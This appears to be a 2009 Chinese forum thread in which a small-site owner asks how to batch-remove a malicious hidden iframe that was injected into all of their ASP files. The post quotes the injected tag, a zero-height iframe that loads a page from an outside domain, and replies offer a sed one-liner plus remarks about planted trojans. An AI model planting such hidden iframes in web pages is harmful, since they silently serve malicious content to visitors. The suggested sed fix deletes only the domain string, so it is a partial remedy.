标题: [文件操作] asp文件被植入恶意代码想批处理去掉如何写代码? [打印本页]
作者: aenzo 时间: 2009-8-2 08:11 标题: asp文件被植入恶意代码想批处理去掉如何写代码?
我的小网站上所有的asp文件最后一行被植入了如下语句:
<iframe src=http://www.114Oldest.com/zz/mm.htm with=100 height=0></iframe>
手动删除很费力,能否写一个批处理程序,将该目录下所有asp文件中的那段代码删掉?
请高手指点一下,感激不尽
[ 本帖最后由 aenzo 于 2009-8-3 08:50 编辑 ]
作者: jellyhk 时间: 2009-8-2 10:44
困难!什么都不知道啊
作者: keen 时间: 2009-8-2 14:29
原帖由 aenzo 于 2009-8-2 08:11 发表 
我的小网站上所有的asp文件被植入了www.114oldest.com的恶意代码,手动删除很费力,能否写一个批处理程序,将该目录下所有asp文件中带有www.114oldest.com字样的代码删掉?请高手指点一下,感激不尽
请把asp中恶意代码的位置,前后有无其他内容,有内容的话,都有什么特征或规律……等等内容贴出来。否则大家根本没办法帮你。
请把问题全部更新到顶楼,请勿跟帖描述问题。
作者: Batcher 时间: 2009-8-2 17:39
- sed -i "s/www\.114oldest\.com//g" "C:\test\*.asp"
第三方命令行工具 sed.exe 下载地址:
http://bbs.bathome.net/thread-1114-1-1.html
作者: renmingwu 时间: 2009-8-2 22:15
他要是给你批量挂代码了话,应该有一个木马文件,你可以找下,那个木马应该也有清除功能的,我原来看到过的。
大部分是应该是挂在一页的最下面,形如<script>代码,有些代码还加密了</script>
[ 本帖最后由 renmingwu 于 2009-8-2 22:17 编辑 ]
| 欢迎光临 批处理之家 (http://bbs.bathome.net/) |
Powered by Discuz! 7.2 |